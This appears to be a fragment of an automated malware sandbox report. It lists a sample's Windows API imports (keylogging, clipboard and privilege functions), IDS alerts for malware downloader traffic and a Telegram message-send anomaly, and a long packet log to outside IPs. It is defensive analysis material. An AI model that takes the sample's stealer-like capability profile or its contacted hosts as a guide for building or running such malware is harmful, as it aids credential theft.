USER32.dll | GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll | EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-10T19:10:45.694316+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH2 | 1 | 192.168.2.6 | 49710 | 193.122.6.168 | 80 | TCP
2025-01-10T19:10:46.897347+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH2 | 1 | 192.168.2.6 | 49710 | 193.122.6.168 | 80 | TCP
2025-01-10T19:10:47.478879+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H3 | 1 | 192.168.2.6 | 49718 | 104.21.16.1 | 443 | TCP
2025-01-10T19:10:49.225489+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH2 | 1 | 192.168.2.6 | 49719 | 193.122.6.168 | 80 | TCP
2025-01-10T19:10:50.491230+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH2 | 1 | 192.168.2.6 | 49736 | 193.122.6.168 | 80 | TCP
2025-01-10T19:10:51.087271+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H3 | 1 | 192.168.2.6 | 49742 | 104.21.16.1 | 443 | TCP
2025-01-10T19:10:53.368242+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H3 | 1 | 192.168.2.6 | 49760 | 104.21.16.1 | 443 | TCP
2025-01-10T19:10:57.116679+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H3 | 1 | 192.168.2.6 | 49788 | 104.21.16.1 | 443 | TCP
2025-01-10T19:10:59.642439+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H3 | 1 | 192.168.2.6 | 49808 | 104.21.16.1 | 443 | TCP
2025-01-10T19:11:00.597825+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.6 | 49814 | 149.154.167.220 | 443 | TCP
2025-01-10T19:11:01.459977+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH2 | 1 | 192.168.2.6 | 49820 | 193.122.6.168 | 80 | TCP
2025-01-10T19:11:02.319252+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH2 | 1 | 192.168.2.6 | 49820 | 193.122.6.168 | 80 | TCP
2025-01-10T19:11:02.891207+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H3 | 1 | 192.168.2.6 | 49833 | 104.21.16.1 | 443 | TCP
2025-01-10T19:11:03.584907+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH2 | 1 | 192.168.2.6 | 49838 | 193.122.6.168 | 80 | TCP
2025-01-10T19:11:04.124384+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H3 | 1 | 192.168.2.6 | 49844 | 104.21.16.1 | 443 | TCP
2025-01-10T19:11:07.926395+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H3 | 1 | 192.168.2.6 | 49876 | 104.21.16.1 | 443 | TCP
2025-01-10T19:11:10.509150+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H3 | 1 | 192.168.2.6 | 49896 | 104.21.16.1 | 443 | TCP
2025-01-10T19:11:12.687611+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.6 | 49913 | 149.154.167.220 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 19:10:44.580339909 CET | 49710 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 19:10:44.585448027 CET | 80 | 49710 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 19:10:44.585546017 CET | 49710 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 19:10:44.585953951 CET | 49710 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 19:10:44.590842962 CET | 80 | 49710 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 19:10:45.235472918 CET | 80 | 49710 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 19:10:45.287982941 CET | 49710 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 19:10:45.449196100 CET | 49710 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 19:10:45.454108953 CET | 80 | 49710 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 19:10:45.640822887 CET | 80 | 49710 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 19:10:45.694315910 CET | 49710 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 19:10:45.794902086 CET | 49712 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 19:10:45.794960022 CET | 443 | 49712 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 19:10:45.795018911 CET | 49712 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 19:10:45.803798914 CET | 49712 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 19:10:45.803814888 CET | 443 | 49712 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 19:10:46.288867950 CET | 443 | 49712 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 19:10:46.288963079 CET | 49712 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 19:10:46.291835070 CET | 49712 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 19:10:46.291846991 CET | 443 | 49712 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 19:10:46.292294979 CET | 443 | 49712 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 19:10:46.334917068 CET | 49712 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 19:10:46.344295025 CET | 49712 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 19:10:46.387336969 CET | 443 | 49712 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 19:10:46.509967089 CET | 443 | 49712 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 19:10:46.510034084 CET | 443 | 49712 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 19:10:46.510109901 CET | 49712 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 19:10:46.517086029 CET | 49712 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 19:10:46.520664930 CET | 49710 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 19:10:46.525607109 CET | 80 | 49710 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 19:10:46.852461100 CET | 80 | 49710 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 19:10:46.855137110 CET | 49718 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 19:10:46.855169058 CET | 443 | 49718 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 19:10:46.855225086 CET | 49718 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 19:10:46.855536938 CET | 49718 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 19:10:46.855549097 CET | 443 | 49718 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 19:10:46.897346973 CET | 49710 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 19:10:47.334722042 CET | 443 | 49718 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 19:10:47.352991104 CET | 49718 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 19:10:47.353030920 CET | 443 | 49718 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 19:10:47.478955030 CET | 443 | 49718 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 19:10:47.479104042 CET | 443 | 49718 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 19:10:47.479171991 CET | 49718 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 19:10:47.479526043 CET | 49718 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 19:10:47.483109951 CET | 49710 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 19:10:47.484077930 CET | 49719 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 19:10:47.488934040 CET | 80 | 49710 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 19:10:47.488969088 CET | 80 | 49719 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 19:10:47.489037037 CET | 49710 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 19:10:47.489079952 CET | 49719 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 19:10:47.489238977 CET | 49719 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 19:10:47.493940115 CET | 80 | 49719 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 19:10:49.170382023 CET | 80 | 49719 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 19:10:49.171622992 CET | 49735 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 19:10:49.171639919 CET | 443 | 49735 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 19:10:49.173386097 CET | 49735 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 19:10:49.173630953 CET | 49735 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 19:10:49.173641920 CET | 443 | 49735 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 19:10:49.225488901 CET | 49719 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 19:10:49.650799036 CET | 443 | 49735 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 19:10:49.652470112 CET | 49735 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 19:10:49.652519941 CET | 443 | 49735 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 19:10:49.782468081 CET | 443 | 49735 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 19:10:49.782541037 CET | 443 | 49735 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 19:10:49.782608032 CET | 49735 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 19:10:49.783198118 CET | 49735 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 19:10:49.786500931 CET | 49719 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 19:10:49.787839890 CET | 49736 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 19:10:49.791610003 CET | 80 | 49719 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 19:10:49.791681051 CET | 49719 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 19:10:49.792674065 CET | 80 | 49736 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 19:10:49.792762041 CET | 49736 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 19:10:49.792860031 CET | 49736 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 19:10:49.797663927 CET | 80 | 49736 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 19:10:50.442044020 CET | 80 | 49736 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 19:10:50.446885109 CET | 49742 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 19:10:50.446928024 CET | 443 | 49742 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 19:10:50.447134972 CET | 49742 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 19:10:50.447220087 CET | 49742 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 19:10:50.447227955 CET | 443 | 49742 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 19:10:50.491230011 CET | 49736 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 19:10:50.927201033 CET | 443 | 49742 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 19:10:50.933598995 CET | 49742 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 19:10:50.933625937 CET | 443 | 49742 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 19:10:51.087301970 CET | 443 | 49742 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 19:10:51.087388992 CET | 443 | 49742 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 19:10:51.087434053 CET | 49742 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 19:10:51.087982893 CET | 49742 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 19:10:51.092453003 CET | 49748 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 19:10:51.097335100 CET | 80 | 49748 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 19:10:51.097429991 CET | 49748 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 19:10:51.097515106 CET | 49748 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 19:10:51.102354050 CET | 80 | 49748 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 19:10:52.732923031 CET | 80 | 49748 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 19:10:52.734277964 CET | 49760 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 19:10:52.734319925 CET | 443 | 49760 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 19:10:52.734386921 CET | 49760 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 19:10:52.734631062 CET | 49760 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 19:10:52.734647989 CET | 443 | 49760 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 19:10:52.772810936 CET | 49748 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 19:10:53.208986998 CET | 443 | 49760 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 19:10:53.212184906 CET | 49760 | 443 | 192.168.2.6 | 104.21.16.1
                                                                                                                Jan 10, 2025 19:10:53.212217093 CET44349760104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:53.368273020 CET44349760104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:53.368340969 CET44349760104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:53.368480921 CET49760443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:53.432013988 CET49760443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:53.563040972 CET4974880192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:53.569159985 CET8049748193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:53.569721937 CET4974880192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:53.571357012 CET4976680192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:53.576230049 CET8049766193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:53.577594042 CET4976680192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:53.577761889 CET4976680192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:53.582488060 CET8049766193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:54.225126028 CET8049766193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:54.226877928 CET49772443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:54.226922989 CET44349772104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:54.226984024 CET49772443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:54.227248907 CET49772443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:54.227261066 CET44349772104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:54.272463083 CET4976680192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:54.694957972 CET44349772104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:54.696918964 CET49772443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:54.696990013 CET44349772104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:54.852854967 CET44349772104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:54.852910042 CET44349772104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:54.852963924 CET49772443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:54.853423119 CET49772443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:54.857994080 CET4976680192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:54.859469891 CET4977880192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:54.863112926 CET8049766193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:54.863182068 CET4976680192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:54.864304066 CET8049778193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:54.864366055 CET4977880192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:54.864471912 CET4977880192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:54.869199991 CET8049778193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:56.503776073 CET8049778193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:56.504952908 CET49788443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:56.504978895 CET44349788104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:56.505129099 CET49788443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:56.505372047 CET49788443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:56.505382061 CET44349788104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:56.553601027 CET4977880192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:56.965151072 CET44349788104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:56.986687899 CET49788443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:56.986711025 CET44349788104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:57.116595030 CET44349788104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:57.116652012 CET44349788104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:57.116745949 CET49788443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:57.117543936 CET49788443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:57.122025967 CET4977880192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:57.122730017 CET4979580192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:57.127089024 CET8049778193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:57.127146006 CET4977880192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:57.127598047 CET8049795193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:57.127686977 CET4979580192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:57.127774000 CET4979580192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:57.132599115 CET8049795193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:57.765115023 CET8049795193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:57.766530991 CET49801443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:57.766562939 CET44349801104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:57.766719103 CET49801443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:57.766989946 CET49801443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:57.767003059 CET44349801104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:57.819240093 CET4979580192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:58.248631001 CET44349801104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:58.259458065 CET49801443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:58.259476900 CET44349801104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:58.398586035 CET44349801104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:58.398684025 CET44349801104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:58.399017096 CET49801443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:58.400876999 CET49801443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:58.401928902 CET4979580192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:58.402966022 CET4980780192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:58.406922102 CET8049795193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:58.407074928 CET4979580192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:58.407805920 CET8049807193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:58.408020973 CET4980780192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:58.408020973 CET4980780192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:58.412920952 CET8049807193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:59.036676884 CET8049807193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:59.039196968 CET49808443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:59.039232016 CET44349808104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:59.039307117 CET49808443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:59.039752960 CET49808443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:59.039772034 CET44349808104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:59.080641031 CET4980780192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:59.493680000 CET44349808104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:59.500963926 CET49808443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:59.500981092 CET44349808104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:59.642411947 CET44349808104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:59.642481089 CET44349808104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:59.642520905 CET49808443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:59.642981052 CET49808443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:59.691555977 CET4980780192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:59.696887016 CET8049807193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:59.696959019 CET4980780192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:59.700210094 CET49814443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 19:10:59.700248003 CET44349814149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 19:10:59.700376034 CET49814443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 19:10:59.700850010 CET49814443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 19:10:59.700870037 CET44349814149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 19:11:00.332587957 CET44349814149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 19:11:00.332731962 CET49814443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 19:11:00.337186098 CET49814443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 19:11:00.337193012 CET44349814149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 19:11:00.337430954 CET44349814149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 19:11:00.339283943 CET49814443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 19:11:00.379324913 CET44349814149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 19:11:00.567138910 CET4982080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:00.572171926 CET8049820193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:11:00.572283030 CET4982080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:00.572510004 CET4982080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:11:00.577310085 CET8049820193.122.6.168192.168.2.6
